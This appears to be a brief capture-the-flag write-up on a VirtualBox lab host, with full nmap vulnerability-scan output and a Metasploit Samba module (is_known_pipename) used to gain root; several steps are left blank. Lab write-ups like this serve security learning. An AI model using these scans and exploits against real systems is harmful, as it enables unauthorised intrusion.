Lets find out the IP first with nmap
The IP is
Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.
root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 184.108.40.206 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.18.85 Host is up (0.00064s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) 53/tcp open domain dnsmasq 2.75 |_clamav-exec: ERROR: Script execution failed (use -d to debug) | vulners: | cpe:/a:thekelleys:dnsmasq:2.75: | CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513 |_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834 80/tcp open http PHP cli server 5.5 or later |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 666/tcp open doom? 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.64 ms 192.168.18.85 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.
samba is running on port 139. Lets try to exploit it before going to ftp.
msfconsole msf5 > msf5 > use exploit/linux/samba/is_known_pipename
Now set the options
Time to run the exploit. Enter
We got the root. Now lets read the flag.
Finished! Thats all for today.